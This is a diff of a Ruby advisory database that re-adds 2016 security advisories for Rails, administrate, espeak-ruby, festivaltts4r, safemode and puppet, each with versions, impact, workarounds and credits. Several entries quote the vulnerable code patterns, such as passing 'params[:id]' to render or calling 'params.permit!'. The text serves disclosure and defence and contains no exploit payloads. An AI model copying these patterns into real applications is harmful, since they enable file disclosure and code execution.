+  - ">= 5.0.0.beta1.1"
+  - "~> 4.2.5, >= 4.2.5.1"
+  - "~> 4.1.14, >= 4.1.14.1"
+  - "~> 3.2.22.1"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2016-0752.md b/advisories/_posts/2016-01-25-CVE-2016-0752.md
index af91697e..26d22e14 100644
--- a/advisories/_posts/2016-01-25-CVE-2016-0752.md
+++ b/advisories/_posts/2016-01-25-CVE-2016-0752.md
@@ -1,101 +1,101 @@
----
-layout: advisory
-title: 'CVE-2016-0752 (actionview): Possible Information Leak Vulnerability in Action
-  View'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2016-0752
-  ghsa: xrr4-p6fq-hjg7
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00
-  title: Possible Information Leak Vulnerability in Action View
-  date: 2016-01-25
-  description: |
-    There is a possible directory traversal and information leak vulnerability in
-    Action View. This vulnerability has been assigned the CVE identifier
-    CVE-2016-0752.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
-
-    Impact
-    ------
-    Applications that pass unverified user input to the `render` method in a
-    controller may be vulnerable to an information leak vulnerability.
-
-    Impacted code will look something like this:
-
-    ```ruby
-    def index
-      render params[:id]
-    end
-    ```
-
-    Carefully crafted requests can cause the above code to render files from
-    unexpected places like outside the application's view directory, and can
-    possibly escalate this to a remote code execution attack.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    A workaround to this issue is to not pass arbitrary user input to the `render`
-    method.  Instead, verify that data before passing it to the `render` method.
-
-    For example, change this:
-
-    ```ruby
-    def index
-      render params[:id]
-    end
-    ```
-
-    To this:
-
-    ```ruby
-    def index
-      render verify_template(params[:id])
-    end
-
-    private
-    def verify_template(name)
-      # add verification logic particular to your application here
-    end
-    ```
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 3-2-render_data_leak.patch - Patch for 3.2 series
-    * 4-1-render_data_leak.patch - Patch for 4.1 series
-    * 4-2-render_data_leak.patch - Patch for 4.2 series
-    * 5-0-render_data_leak.patch - Patch for 5.0 series
-
-    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
-    of earlier unsupported releases are advised to upgrade as soon as possible as we
-    cannot guarantee the continued availability of security fixes for unsupported
-    releases.
-
-    Credits
-    -------
-    Thanks John Poulin for reporting this!
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 5.0.0.beta1.1"
-  - "~> 4.2.5, >= 4.2.5.1"
-  - "~> 4.1.14, >= 4.1.14.1"
----
+---
+layout: advisory
+title: 'CVE-2016-0752 (actionview): Possible Information Leak Vulnerability in Action
+  View'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2016-0752
+  ghsa: xrr4-p6fq-hjg7
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00
+  title: Possible Information Leak Vulnerability in Action View
+  date: 2016-01-25
+  description: |
+    There is a possible directory traversal and information leak vulnerability in
+    Action View. This vulnerability has been assigned the CVE identifier
+    CVE-2016-0752.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1
+
+    Impact
+    ------
+    Applications that pass unverified user input to the `render` method in a
+    controller may be vulnerable to an information leak vulnerability.
+
+    Impacted code will look something like this:
+
+    ```ruby
+    def index
+      render params[:id]
+    end
+    ```
+
+    Carefully crafted requests can cause the above code to render files from
+    unexpected places like outside the application's view directory, and can
+    possibly escalate this to a remote code execution attack.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    A workaround to this issue is to not pass arbitrary user input to the `render`
+    method.  Instead, verify that data before passing it to the `render` method.
+
+    For example, change this:
+
+    ```ruby
+    def index
+      render params[:id]
+    end
+    ```
+
+    To this:
+
+    ```ruby
+    def index
+      render verify_template(params[:id])
+    end
+
+    private
+    def verify_template(name)
+      # add verification logic particular to your application here
+    end
+    ```
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 3-2-render_data_leak.patch - Patch for 3.2 series
+    * 4-1-render_data_leak.patch - Patch for 4.1 series
+    * 4-2-render_data_leak.patch - Patch for 4.2 series
+    * 5-0-render_data_leak.patch - Patch for 5.0 series
+
+    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
+    of earlier unsupported releases are advised to upgrade as soon as possible as we
+    cannot guarantee the continued availability of security fixes for unsupported
+    releases.
+
+    Credits
+    -------
+    Thanks John Poulin for reporting this!
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 5.0.0.beta1.1"
+  - "~> 4.2.5, >= 4.2.5.1"
+  - "~> 4.1.14, >= 4.1.14.1"
+---
diff --git a/advisories/_posts/2016-01-25-CVE-2016-0753.md b/advisories/_posts/2016-01-25-CVE-2016-0753.md
index b66c0c44..545f703a 100644
--- a/advisories/_posts/2016-01-25-CVE-2016-0753.md
+++ b/advisories/_posts/2016-01-25-CVE-2016-0753.md
@@ -1,100 +1,100 @@
----
-layout: advisory
-title: 'CVE-2016-0753 (activemodel): Possible Input Validation Circumvention in Active
-  Model'
-comments: false
-categories:
-- activemodel
-- rails
-advisory:
-  gem: activemodel
-  framework: rails
-  cve: 2016-0753
-  ghsa: 543v-gj2c-r3ch
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/6jQVC1geukQ
-  title: Possible Input Validation Circumvention in Active Model
-  date: 2016-01-25
-  description: |
-    There is a possible input validation circumvention vulnerability in Active
-    Model. This vulnerability has been assigned the CVE identifier CVE-2016-0753.
-
-    Versions Affected:  4.1.0 and newer
-    Not affected:       4.0.13 and older
-    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1
-
-    Impact
-    ------
-    Code that uses Active Model based models (including Active Record models) and
-    does not validate user input before passing it to the model can be subject to
-    an attack where specially crafted input will cause the model to skip
-    validations.
-
-    Vulnerable code will look something like this:
-
-    ```ruby
-    SomeModel.new(unverified_user_input)
-    ```
-
-    Rails users using Strong Parameters are generally not impacted by this issue
-    as they are encouraged to whitelist parameters and must specifically opt-out
-    of input verification using the `permit!` method to allow mass assignment.
-
-    For example, a vulnerable Rails application will have code that looks like
-    this:
-
-    ```ruby
-    def create
-      params.permit! # allow all parameters
-      @user = User.new params[:users]
-    end
-    ```
-
-    Active Model and Active Record objects are not equipped to handle arbitrary
-    user input.  It is up to the application to verify input before passing it to
-    Active Model models.  Rails users already have Strong Parameters in place to
-    handle white listing, but applications using Active Model and Active Record
-    outside of a Rails environment may be impacted.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    There are several workarounds depending on the application.  Inside a Rails
-    application, stop using `permit!`.  Outside a Rails application, either use
-    Hash#slice to select the parameters you need, or integrate Strong Parameters
-    with your application.
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches for
-    the two supported release series. They are in git-am format and consist of a
-    single changeset.
-
-    * 4-1-validation_skip.patch - Patch for 4.1 series
-    * 4-2-validation_skip.patch - Patch for 4.2 series
-    * 5-0-validation_skip.patch - Patch for 5.0 series
-
-    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
-    of earlier unsupported releases are advised to upgrade as soon as possible as we
-    cannot guarantee the continued availability of security fixes for unsupported
-    releases.
-
-    Credits
-    -------
-    Thanks to:
-
-    [John Backus](https://github.com/backus) from BlockScore for reporting this!
-  cvss_v2: 5.0
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "<= 4.0.13"
-  patched_versions:
-  - ">= 5.0.0.beta1.1"
-  - "~> 4.2.5, >= 4.2.5.1"
-  - "~> 4.1.14, >= 4.1.14.1"
----
+---
+layout: advisory
+title: 'CVE-2016-0753 (activemodel): Possible Input Validation Circumvention in Active
+  Model'
+comments: false
+categories:
+- activemodel
+- rails
+advisory:
+  gem: activemodel
+  framework: rails
+  cve: 2016-0753
+  ghsa: 543v-gj2c-r3ch
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/6jQVC1geukQ
+  title: Possible Input Validation Circumvention in Active Model
+  date: 2016-01-25
+  description: |
+    There is a possible input validation circumvention vulnerability in Active
+    Model. This vulnerability has been assigned the CVE identifier CVE-2016-0753.
+
+    Versions Affected:  4.1.0 and newer
+    Not affected:       4.0.13 and older
+    Fixed Versions:     5.0.0.beta1.1, 4.2.5.1, 4.1.14.1
+
+    Impact
+    ------
+    Code that uses Active Model based models (including Active Record models) and
+    does not validate user input before passing it to the model can be subject to
+    an attack where specially crafted input will cause the model to skip
+    validations.
+
+    Vulnerable code will look something like this:
+
+    ```ruby
+    SomeModel.new(unverified_user_input)
+    ```
+
+    Rails users using Strong Parameters are generally not impacted by this issue
+    as they are encouraged to whitelist parameters and must specifically opt-out
+    of input verification using the `permit!` method to allow mass assignment.
+
+    For example, a vulnerable Rails application will have code that looks like
+    this:
+
+    ```ruby
+    def create
+      params.permit! # allow all parameters
+      @user = User.new params[:users]
+    end
+    ```
+
+    Active Model and Active Record objects are not equipped to handle arbitrary
+    user input.  It is up to the application to verify input before passing it to
+    Active Model models.  Rails users already have Strong Parameters in place to
+    handle white listing, but applications using Active Model and Active Record
+    outside of a Rails environment may be impacted.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    There are several workarounds depending on the application.  Inside a Rails
+    application, stop using `permit!`.  Outside a Rails application, either use
+    Hash#slice to select the parameters you need, or integrate Strong Parameters
+    with your application.
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches for
+    the two supported release series. They are in git-am format and consist of a
+    single changeset.
+
+    * 4-1-validation_skip.patch - Patch for 4.1 series
+    * 4-2-validation_skip.patch - Patch for 4.2 series
+    * 5-0-validation_skip.patch - Patch for 5.0 series
+
+    Please note that only the 4.1.x and 4.2.x series are supported at present. Users
+    of earlier unsupported releases are advised to upgrade as soon as possible as we
+    cannot guarantee the continued availability of security fixes for unsupported
+    releases.
+
+    Credits
+    -------
+    Thanks to:
+
+    [John Backus](https://github.com/backus) from BlockScore for reporting this!
+  cvss_v2: 5.0
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "<= 4.0.13"
+  patched_versions:
+  - ">= 5.0.0.beta1.1"
+  - "~> 4.2.5, >= 4.2.5.1"
+  - "~> 4.1.14, >= 4.1.14.1"
+---
diff --git a/advisories/_posts/2016-02-29-CVE-2016-2097.md b/advisories/_posts/2016-02-29-CVE-2016-2097.md
index 0141f134..242f0b38 100644
--- a/advisories/_posts/2016-02-29-CVE-2016-2097.md
+++ b/advisories/_posts/2016-02-29-CVE-2016-2097.md
@@ -1,95 +1,95 @@
----
-layout: advisory
-title: 'CVE-2016-2097 (actionview): Possible Information Leak Vulnerability in Action
-  View'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2016-2097
-  ghsa: vx9j-46rh-fqr8
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/ddY6HgqB2z4
-  title: Possible Information Leak Vulnerability in Action View
-  date: 2016-02-29
-  description: |2
-
-    There is a possible directory traversal and information leak vulnerability
-    in Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2
-    patch was not covering all the scenarios. This vulnerability has been
-    assigned the CVE identifier CVE-2016-2097.
-
-    Versions Affected:  3.2.x, 4.0.x, 4.1.x
-    Not affected:       4.2+
-    Fixed Versions:     3.2.22.2, 4.1.14.2
-
-    Impact
-    ------
-    Applications that pass unverified user input to the `render` method in a
-    controller may be vulnerable to an information leak vulnerability.
-
-    Impacted code will look something like this:
-
-    ```ruby
-    def index
-      render params[:id]
-    end
-    ```
-
-    Carefully crafted requests can cause the above code to render files from
-    unexpected places like outside the application's view directory, and can
-    possibly escalate this to a remote code execution attack.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    A workaround to this issue is to not pass arbitrary user input to the `render`
-    method. Instead, verify that data before passing it to the `render` method.
-
-    For example, change this:
-
-    ```ruby
-    def index
-      render params[:id]
-    end
-    ```
-
-    To this:
-
-    ```ruby
-    def index
-      render verify_template(params[:id])
-    end
-
-    private
-    def verify_template(name)
-      # add verification logic particular to your application here
-    end
-    ```
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided patches
-    for it. It is in git-am format and consist of a single changeset.
-
-    * 3-2-render_data_leak_2.patch - Patch for 3.2 series
-    * 4-1-render_data_leak_2.patch - Patch for 4.1 series
-
-    Credits
-    -------
-    Thanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this
-    and working with us in the patch!
-  cvss_v3: 5.3
-  unaffected_versions:
-  - ">= 4.2.0"
-  patched_versions:
-  - "~> 4.1.14, >= 4.1.14.2"
----
+---
+layout: advisory
+title: 'CVE-2016-2097 (actionview): Possible Information Leak Vulnerability in Action
+  View'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2016-2097
+  ghsa: vx9j-46rh-fqr8
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/ddY6HgqB2z4
+  title: Possible Information Leak Vulnerability in Action View
+  date: 2016-02-29
+  description: |2
+
+    There is a possible directory traversal and information leak vulnerability
+    in Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2
+    patch was not covering all the scenarios. This vulnerability has been
+    assigned the CVE identifier CVE-2016-2097.
+
+    Versions Affected:  3.2.x, 4.0.x, 4.1.x
+    Not affected:       4.2+
+    Fixed Versions:     3.2.22.2, 4.1.14.2
+
+    Impact
+    ------
+    Applications that pass unverified user input to the `render` method in a
+    controller may be vulnerable to an information leak vulnerability.
+
+    Impacted code will look something like this:
+
+    ```ruby
+    def index
+      render params[:id]
+    end
+    ```
+
+    Carefully crafted requests can cause the above code to render files from
+    unexpected places like outside the application's view directory, and can
+    possibly escalate this to a remote code execution attack.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    A workaround to this issue is to not pass arbitrary user input to the `render`
+    method. Instead, verify that data before passing it to the `render` method.
+
+    For example, change this:
+
+    ```ruby
+    def index
+      render params[:id]
+    end
+    ```
+
+    To this:
+
+    ```ruby
+    def index
+      render verify_template(params[:id])
+    end
+
+    private
+    def verify_template(name)
+      # add verification logic particular to your application here
+    end
+    ```
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided patches
+    for it. It is in git-am format and consist of a single changeset.
+
+    * 3-2-render_data_leak_2.patch - Patch for 3.2 series
+    * 4-1-render_data_leak_2.patch - Patch for 4.1 series
+
+    Credits
+    -------
+    Thanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this
+    and working with us in the patch!
+  cvss_v3: 5.3
+  unaffected_versions:
+  - ">= 4.2.0"
+  patched_versions:
+  - "~> 4.1.14, >= 4.1.14.2"
+---
diff --git a/advisories/_posts/2016-02-29-CVE-2016-2098.md b/advisories/_posts/2016-02-29-CVE-2016-2098.md
index 7c18c910..346d982e 100644
--- a/advisories/_posts/2016-02-29-CVE-2016-2098.md
+++ b/advisories/_posts/2016-02-29-CVE-2016-2098.md
@@ -1,96 +1,96 @@
----
-layout: advisory
-title: 'CVE-2016-2098 (actionpack): Possible remote code execution vulnerability in
-  Action Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2016-2098
-  ghsa: 78rc-8c29-p45g
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
-  title: Possible remote code execution vulnerability in Action Pack
-  date: 2016-02-29
-  description: |
-    There is a possible remote code execution vulnerability in Action Pack.
-    This vulnerability has been assigned the CVE identifier CVE-2016-2098.
-
-    Versions Affected:  3.2.x, 4.0.x, 4.1.x, 4.2.x
-    Not affected:       5.0+
-    Fixed Versions:     3.2.22.2, 4.1.14.2, 4.2.5.2
-
-    Impact
-    ------
-    Applications that pass unverified user input to the `render` method in a
-    controller or a view may be vulnerable to a code injection.
-
-    Impacted code will look like this:
-
-    ```ruby
-    class TestController < ApplicationController
-      def show
-        render params[:id]
-      end
-    end
-    ```
-
-    An attacker could use the request parameters to coerce the above example
-    to execute arbitrary ruby code.
-
-    All users running an affected release should either upgrade or use one of
-    the workarounds immediately.
-
-    Releases
-    --------
-    The FIXED releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    A workaround to this issue is to not pass arbitrary user input to the `render`
-    method. Instead, verify that data before passing it to the `render` method.
-
-    For example, change this:
-
-    ```ruby
-    def index
-      render params[:id]
-    end
-    ```
-
-    To this:
-
-    ```ruby
-    def index
-      render verify_template(params[:id])
-    end
-
-    private
-    def verify_template(name)
-      # add verification logic particular to your application here
-    end
-    ```
-
-    Patches
-    -------
-    To aid users who aren't able to upgrade immediately we have provided a
-    patch for it. It is in git-am format and consist of a single changeset.
-
-    * 3-2-secure_inline_with_params.patch - Patch for 3.2 series
-    * 4-1-secure_inline_with_params.patch - Patch for 4.1 series
-    * 4-2-secure_inline_with_params.patch - Patch for 4.2 series
-
-    Credits
-    -------
-    Thanks to both Tobias Kraze from makandra and joernchen of Phenoelit for
-    reporting this!
-  cvss_v3: 7.3
-  unaffected_versions:
-  - ">= 5.0.0.beta1"
-  patched_versions:
-  - "~> 3.2.22.2"
-  - "~> 4.2.5, >= 4.2.5.2"
-  - "~> 4.1.14, >= 4.1.14.2"
----
+---
+layout: advisory
+title: 'CVE-2016-2098 (actionpack): Possible remote code execution vulnerability in
+  Action Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2016-2098
+  ghsa: 78rc-8c29-p45g
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
+  title: Possible remote code execution vulnerability in Action Pack
+  date: 2016-02-29
+  description: |
+    There is a possible remote code execution vulnerability in Action Pack.
+    This vulnerability has been assigned the CVE identifier CVE-2016-2098.
+
+    Versions Affected:  3.2.x, 4.0.x, 4.1.x, 4.2.x
+    Not affected:       5.0+
+    Fixed Versions:     3.2.22.2, 4.1.14.2, 4.2.5.2
+
+    Impact
+    ------
+    Applications that pass unverified user input to the `render` method in a
+    controller or a view may be vulnerable to a code injection.
+
+    Impacted code will look like this:
+
+    ```ruby
+    class TestController < ApplicationController
+      def show
+        render params[:id]
+      end
+    end
+    ```
+
+    An attacker could use the request parameters to coerce the above example
+    to execute arbitrary ruby code.
+
+    All users running an affected release should either upgrade or use one of
+    the workarounds immediately.
+
+    Releases
+    --------
+    The FIXED releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    A workaround to this issue is to not pass arbitrary user input to the `render`
+    method. Instead, verify that data before passing it to the `render` method.
+
+    For example, change this:
+
+    ```ruby
+    def index
+      render params[:id]
+    end
+    ```
+
+    To this:
+
+    ```ruby
+    def index
+      render verify_template(params[:id])
+    end
+
+    private
+    def verify_template(name)
+      # add verification logic particular to your application here
+    end
+    ```
+
+    Patches
+    -------
+    To aid users who aren't able to upgrade immediately we have provided a
+    patch for it. It is in git-am format and consist of a single changeset.
+
+    * 3-2-secure_inline_with_params.patch - Patch for 3.2 series
+    * 4-1-secure_inline_with_params.patch - Patch for 4.1 series
+    * 4-2-secure_inline_with_params.patch - Patch for 4.2 series
+
+    Credits
+    -------
+    Thanks to both Tobias Kraze from makandra and joernchen of Phenoelit for
+    reporting this!
+  cvss_v3: 7.3
+  unaffected_versions:
+  - ">= 5.0.0.beta1"
+  patched_versions:
+  - "~> 3.2.22.2"
+  - "~> 4.2.5, >= 4.2.5.2"
+  - "~> 4.1.14, >= 4.1.14.2"
+---
diff --git a/advisories/_posts/2016-04-01-CVE-2016-3098.md b/advisories/_posts/2016-04-01-CVE-2016-3098.md
index 46ba3ff5..cbf2d0ca 100644
--- a/advisories/_posts/2016-04-01-CVE-2016-3098.md
+++ b/advisories/_posts/2016-04-01-CVE-2016-3098.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2016-3098 (administrate): Cross-site request forgery (CSRF) vulnerability
-  in administrate gem'
-comments: false
-categories:
-- administrate
-advisory:
-  gem: administrate
-  cve: 2016-3098
-  ghsa: cc8c-26rj-v2vx
-  url: http://seclists.org/oss-sec/2016/q2/0
-  title: Cross-site request forgery (CSRF) vulnerability in administrate gem
-  date: 2016-04-01
-  description: |
-    "`Administrate::ApplicationController` actions didn't have CSRF protection.
-    Remote attackers can hijack user's sessions and use any functionality that administrate
-    exposes on their behalf."
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 0.1.5"
----
+---
+layout: advisory
+title: 'CVE-2016-3098 (administrate): Cross-site request forgery (CSRF) vulnerability
+  in administrate gem'
+comments: false
+categories:
+- administrate
+advisory:
+  gem: administrate
+  cve: 2016-3098
+  ghsa: cc8c-26rj-v2vx
+  url: http://seclists.org/oss-sec/2016/q2/0
+  title: Cross-site request forgery (CSRF) vulnerability in administrate gem
+  date: 2016-04-01
+  description: |
+    "`Administrate::ApplicationController` actions didn't have CSRF protection.
+    Remote attackers can hijack user's sessions and use any functionality that administrate
+    exposes on their behalf."
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 0.1.5"
+---
diff --git a/advisories/_posts/2016-04-13-CVE-2016-10193.md b/advisories/_posts/2016-04-13-CVE-2016-10193.md
index 26e97227..2027b93e 100644
--- a/advisories/_posts/2016-04-13-CVE-2016-10193.md
+++ b/advisories/_posts/2016-04-13-CVE-2016-10193.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2016-10193 (espeak-ruby): espeak-ruby Gem for Ruby Arbitrary Command Execution'
-comments: false
-categories:
-- espeak-ruby
-advisory:
-  gem: espeak-ruby
-  cve: 2016-10193
-  ghsa: 4jm3-pfpf-h54p
-  url: https://github.com/dejan/espeak-ruby/issues/7
-  title: espeak-ruby Gem for Ruby Arbitrary Command Execution
-  date: 2016-04-13
-  description: |
-    espeak-ruby passes user modifiable strings directly to a shell
-    command. An attacker can execute malicious commands by modifying
-    the strings that are passed as arguments to the speak, save, bytes
-    and bytes_wav methods in the lib/espeak/speech.rb library.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.0.3"
----
+---
+layout: advisory
+title: 'CVE-2016-10193 (espeak-ruby): espeak-ruby Gem for Ruby Arbitrary Command Execution'
+comments: false
+categories:
+- espeak-ruby
+advisory:
+  gem: espeak-ruby
+  cve: 2016-10193
+  ghsa: 4jm3-pfpf-h54p
+  url: https://github.com/dejan/espeak-ruby/issues/7
+  title: espeak-ruby Gem for Ruby Arbitrary Command Execution
+  date: 2016-04-13
+  description: |
+    espeak-ruby passes user modifiable strings directly to a shell
+    command. An attacker can execute malicious commands by modifying
+    the strings that are passed as arguments to the speak, save, bytes
+    and bytes_wav methods in the lib/espeak/speech.rb library.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.0.3"
+---
diff --git a/advisories/_posts/2016-04-20-CVE-2016-3693.md b/advisories/_posts/2016-04-20-CVE-2016-3693.md
index 684997a5..7a7a9e09 100644
--- a/advisories/_posts/2016-04-20-CVE-2016-3693.md
+++ b/advisories/_posts/2016-04-20-CVE-2016-3693.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2016-3693 (safemode): Safemode Gem for Ruby is vulnerable to information
-  disclosure'
-comments: false
-categories:
-- safemode
-advisory:
-  gem: safemode
-  cve: 2016-3693
-  ghsa: c92m-rrrc-q5wf
-  url: http://seclists.org/oss-sec/2016/q2/119
-  title: Safemode Gem for Ruby is vulnerable to information disclosure
-  date: 2016-04-20
-  description: |
-    Safemode is initialised with an optional 'delegate' object.
-    If the delegated object is a Rails controller, 'inspect' could
-    be called which then exposes all informations about the App,
-    including routes, secret tokens, caches and so on.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 1.2.4"
----
+---
+layout: advisory
+title: 'CVE-2016-3693 (safemode): Safemode Gem for Ruby is vulnerable to information
+  disclosure'
+comments: false
+categories:
+- safemode
+advisory:
+  gem: safemode
+  cve: 2016-3693
+  ghsa: c92m-rrrc-q5wf
+  url: http://seclists.org/oss-sec/2016/q2/119
+  title: Safemode Gem for Ruby is vulnerable to information disclosure
+  date: 2016-04-20
+  description: |
+    Safemode is initialised with an optional 'delegate' object.
+    If the delegated object is a Rails controller, 'inspect' could
+    be called which then exposes all informations about the App,
+    including routes, secret tokens, caches and so on.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 1.2.4"
+---
diff --git a/advisories/_posts/2016-04-23-CVE-2016-10194.md b/advisories/_posts/2016-04-23-CVE-2016-10194.md
index 890858bc..46b820bd 100644
--- a/advisories/_posts/2016-04-23-CVE-2016-10194.md
+++ b/advisories/_posts/2016-04-23-CVE-2016-10194.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2016-10194 (festivaltts4r): festivaltts4r Gem for Ruby Arbitrary Command
-  Execution'
-comments: false
-categories:
-- festivaltts4r
-advisory:
-  gem: festivaltts4r
-  cve: 2016-10194
-  ghsa: f7f4-5w9j-23p2
-  url: https://github.com/spejman/festivaltts4r/issues/1
-  title: festivaltts4r Gem for Ruby Arbitrary Command Execution
-  date: 2016-04-23
-  description: |
-    festivaltts4r passes user modifiable strings directly to a shell
-    command. An attacker can execute malicious commands by modifying
-    the strings that are passed as arguments to the to_speech and
-    and to_mp3 methods in lib/festivaltts4r/festival4r.rb library.
-  cvss_v3: 9.8
----
+---
+layout: advisory
+title: 'CVE-2016-10194 (festivaltts4r): festivaltts4r Gem for Ruby Arbitrary Command
+  Execution'
+comments: false
+categories:
+- festivaltts4r
+advisory:
+  gem: festivaltts4r
+  cve: 2016-10194
+  ghsa: f7f4-5w9j-23p2
+  url: https://github.com/spejman/festivaltts4r/issues/1
+  title: festivaltts4r Gem for Ruby Arbitrary Command Execution
+  date: 2016-04-23
+  description: |
+    festivaltts4r passes user modifiable strings directly to a shell
+    command. An attacker can execute malicious commands by modifying
+    the strings that are passed as arguments to the to_speech and
+    and to_mp3 methods in lib/festivaltts4r/festival4r.rb library.
+  cvss_v3: 9.8
+---
diff --git a/advisories/_posts/2016-04-26-CVE-2016-2785.md b/advisories/_posts/2016-04-26-CVE-2016-2785.md
index 6ed3254a..8b9747f6 100644
--- a/advisories/_posts/2016-04-26-CVE-2016-2785.md
+++ b/advisories/_posts/2016-04-26-CVE-2016-2785.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2016-2785 (puppet): Puppet Improper Access Control'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2016-2785
-  ghsa: pqj5-7r86-64fv
-  url: https://www.puppet.com/security/cve/cve-2016-2785-incorrect-url-decoding
-  title: Puppet Improper Access Control
-  date: 2016-04-26
-  description: |
-    Puppet Server before 2.3.2 and
-    Ruby puppetmaster in Puppet 4.x before 4.4.2 and in
-    Puppet Agent before 1.4.2
-    might allow remote attackers to bypass intended auth.conf
-    access restrictions by leveraging incorrect URL decoding.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 4.4.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-2785
-    - https://www.puppet.com/security/cve/cve-2016-2785-incorrect-url-decoding
-    - https://github.com/puppetlabs/puppet/pull/4921
-    - https://github.com/puppetlabs/puppet/pull/4921/commits/8d2ce797db265720f0a20d1d46ee2757b4e4f6b2
-    - https://security.gentoo.org/glsa/201606-02
-    - https://github.com/advisories/GHSA-pqj5-7r86-64fv
----
+---
+layout: advisory
+title: 'CVE-2016-2785 (puppet): Puppet Improper Access Control'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2016-2785
+  ghsa: pqj5-7r86-64fv
+  url: https://www.puppet.com/security/cve/cve-2016-2785-incorrect-url-decoding
+  title: Puppet Improper Access Control
+  date: 2016-04-26
+  description: |
+    Puppet Server before 2.3.2 and
+    Ruby puppetmaster in Puppet 4.x before 4.4.2 and in
+    Puppet Agent before 1.4.2
+    might allow remote attackers to bypass intended auth.conf
+    access restrictions by leveraging incorrect URL decoding.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 4.4.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-2785
+    - https://www.puppet.com/security/cve/cve-2016-2785-incorrect-url-decoding
+    - https://github.com/puppetlabs/puppet/pull/4921
+    - https://github.com/puppetlabs/puppet/pull/4921/commits/8d2ce797db265720f0a20d1d46ee2757b4e4f6b2
+    - https://security.gentoo.org/glsa/201606-02
+    - https://github.com/advisories/GHSA-pqj5-7r86-64fv
+---
diff --git a/advisories/_posts/2016-05-18-CVE-2016-4442.md b/advisories/_posts/2016-05-18-CVE-2016-4442.md
index bb5be4ac..fec1c4c7 100644
--- a/advisories/_posts/2016-05-18-CVE-2016-4442.md
+++ b/advisories/_posts/2016-05-18-CVE-2016-4442.md
@@ -1,24 +1,24 @@
----
-layout: advisory
